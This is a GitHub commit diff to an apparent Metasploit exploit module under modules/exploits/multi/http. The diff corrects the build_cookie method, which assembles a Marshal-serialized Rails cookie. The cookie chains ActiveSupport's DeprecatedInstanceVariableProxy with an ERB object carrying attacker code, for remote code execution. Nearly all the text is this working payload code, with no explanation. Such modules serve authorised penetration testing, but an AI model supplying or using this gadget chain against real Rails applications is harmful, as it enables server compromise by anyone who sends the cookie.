File tree Expand file tree Collapse file tree 1 file changed +4
-2
lines changed
modules/exploits/multi/http Expand file tree Collapse file tree 1 file changed +4
-2
lines changed Original file line number Diff line number Diff line change @@ -200,18 +200,20 @@ def build_cookie
200
200
return "\x04 \b " +
201
201
"o:@ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy\b " +
202
202
":\x0E @instanceo" +
203
- ":\b ERB\x06 " +
203
+ ":\b ERB\x07 " +
204
204
":\t @src" + Marshal . dump ( code ) [ 2 ..-1 ] +
205
+ ":\x0c @lineno" + "i\x00 " +
205
206
":\f @method:\v result:" +
206
207
"\x10 @deprecatoro:\x1F ActiveSupport::Deprecation\x00 "
207
208
end
208
209
if datastore [ 'RAILSVERSION' ] == 3
209
210
return Rex ::Text . encode_base64 "\x04 \x08 " +
210
211
"o" +":\x40 ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +"\x07 " +
211
212
":\x0E @instance" +
212
- "o" +":\x08 ERB" +"\x06 " +
213
+ "o" +":\x08 ERB" +"\x07 " +
213
214
":\x09 @src" +
214
215
Marshal . dump ( code ) [ 2 ..-1 ] +
216
+ ":\x0c @lineno" + "i\x00 " +
215
217
":\x0C @method" +":\x0B result"
216
218
end
217
219
end
You can’t perform that action at this time.
0 commit comments